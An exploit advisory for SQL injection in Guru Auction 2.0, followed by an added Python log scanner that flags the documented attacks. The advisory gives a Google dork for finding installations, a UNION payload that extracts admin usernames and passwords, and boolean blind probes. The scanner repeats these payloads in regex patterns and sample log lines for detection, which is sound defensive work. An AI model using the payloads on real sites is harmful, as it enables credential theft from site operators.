Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login page:
~~~~~~~~~~
http://domain.tld/[path]/admin/
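As an added defender-side example (not part of the advisory), the following Python script scans web-server access log lines for the two request shapes the advisory documents: a UNION-based extraction through `subcat.php?cate_id=` and a boolean blind probe on `@@version` through `detail.php?item_id=`. The script and parameter names come from the advisory; the log lines, client addresses, `/shop/` path and finding tags are constructed for the demonstration.

```python
"""Flag the Guru Auction 2.0 injection patterns in combined-format access logs.

Added example, not part of the advisory. The script names and integer
parameters are taken from the advisory; the sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Affected scripts and the parameter that should only ever carry an integer.
NUMERIC_PARAMS = {
    "/subcat.php": "cate_id",
    "/detail.php": "item_id",
}

# Token patterns for the two PoCs: UNION-based extraction and a boolean
# blind probe on @@version.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("group-concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("blind-version-probe", re.compile(r"\band\b\s+substring\s*\(\s*@@version", re.I)),
    ("comment-terminator", re.compile(r"--\s*$|#\s*$")),
]

# Minimal combined-log parser: client IP, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

# Constructed sample log: one benign request, the two PoC shapes, and a
# visit to the admin path (not an injection, so it must not be flagged).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 6044',
    '198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 8120',
    '198.51.100.23 - - [10/Oct/2023:13:56:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 3011',
    '192.0.2.5 - - [10/Oct/2023:13:57:10 +0000] "GET /shop/admin/ HTTP/1.1" 200 1450',
]


def classify_request(target: str) -> list:
    """Return finding tags for one request target (path plus query string).

    parse_qs percent-decodes once and turns '+' into a space, which is the
    form the PoC URLs use; a second decoding pass would be needed for
    double-encoded payloads.
    """
    parts = urlsplit(target)
    script = "/" + parts.path.rsplit("/", 1)[-1]
    param = NUMERIC_PARAMS.get(script)
    if param is None:
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get(param)
    if not values:
        return []
    value = values[0]
    findings = []
    # The parameter is an integer id; anything else is already suspicious.
    if not re.fullmatch(r"-?\d+", value.strip()):
        findings.append("non-numeric-id")
    for tag, pattern in SQLI_PATTERNS:
        if pattern.search(value):
            findings.append(tag)
    return findings


def scan_log(lines) -> list:
    """Return (client_ip, target, findings) for every flagged request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _method, target, _status = match.groups()
        findings = classify_request(target)
        if findings:
            hits.append((ip, target, findings))
    return hits


def blind_probe_sources(lines) -> dict:
    """Count blind @@version probes per client; repeats from one address
    are the signature of an automated true/false oracle."""
    counts = {}
    for ip, _target, findings in scan_log(lines):
        if "blind-version-probe" in findings:
            counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
    print("blind probe sources:", blind_probe_sources(SAMPLE_LOG))
```

The UNION payload trips four tags at once, while each blind probe trips only the non-numeric check and the `@@version` pattern; the per-client count is what turns two innocuous-looking boolean requests into an alert.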